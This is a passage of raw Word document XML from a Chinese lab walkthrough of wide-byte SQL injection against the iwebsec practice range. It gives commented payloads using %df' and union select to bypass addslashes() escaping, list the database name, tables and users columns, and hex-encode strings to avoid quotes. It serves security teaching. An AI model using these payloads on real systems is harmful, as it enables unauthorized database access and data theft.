              </w:rPr>
              <w:br/>
              <w:t>-- 2. %df'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：宽字节绕过转义，闭合原始</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>的单引号；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 3. union select 1,2,3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：联合查询，查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>个虚拟字段（对应前面探测到的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>列）；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 4. --+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：注释后续内容，避免语法报错；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-- 5. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>预期结果：页面显示</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，说明第</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>列为回显位（后</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>续可在这两个位置获取数据库数据）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BD8260A" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="heading_17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：获取数据库名（基础信息探测）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18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7220A3" w14:paraId="7DAB0A45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336DE6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sql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>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>靶场地址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/sqli/06.php?id=-1%df' union select 1,2,database()--+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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>逐行注释：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 1. database()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>内置函数，用于获取当前数据库名；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 2. 2,database()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：将数据库名显示在第</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>个回显位（也可改为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3,database()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，显示在第</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>个回显位）；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-- 3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>预期结果：页面显示当前数据库名（通常为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>iwebsec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4797A1D6" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="heading_18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：获取所有表名（核心信息探测）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19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7220A3" w14:paraId="6F1D3D35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6406508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sql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>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>靶场地址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/sqli/06.php?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>逐行注释：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lastRenderedPageBreak/>
              <w:t>-- 1. group_concat(table_name)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：将查询到的所有表名拼接成一个字符串，方便查看（避免多行显示）；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 2. information_sch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ema.tables</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>系统表，存储所有数据库的表信息；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 3. where table_schema=database()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：筛选当前数据库（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>iwebsec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>）的表；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-- 4. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>预期结果：页面显示当前数据库下的所有表名（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>等，核心表为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="266E1EE3" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="heading_19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>表字段名（解决报错问题）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="4E4ECBC3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原</w:t>
      </w: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（报错）：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7220A3" w14:paraId="3778166C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5DC1260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sql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>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>靶场地址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/sqli/06.php?id=-1%df' union select 1,2,group_concat(column_</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>name) from information_schema.columns where table_schema=database() and table_name='users'--+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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>报错原因：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>table_name='users'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>中的单引号</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>被</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>addslashes()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>转义为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>\'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，导致</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>语法错误（报错信息：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>near '\'users\'-- ' LIMIT 0,1'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7612C9F1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正确</w:t>
      </w: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（无报错，直接复制使用）：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7220A3" w14:paraId="5D9F41BE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3DC8B7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sql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>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>靶场地址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/sqli/06.php?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>逐行注释（重点解决报错）：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 1. 0x7573657273</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>进制编码（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>u=75</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>s=73</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>e=65</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>r=72</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>s=73</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>）；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-- 2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>核心解决</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>逻辑：用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>进制编码替代单引号包裹的字符串，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>会自动识别</w:t>
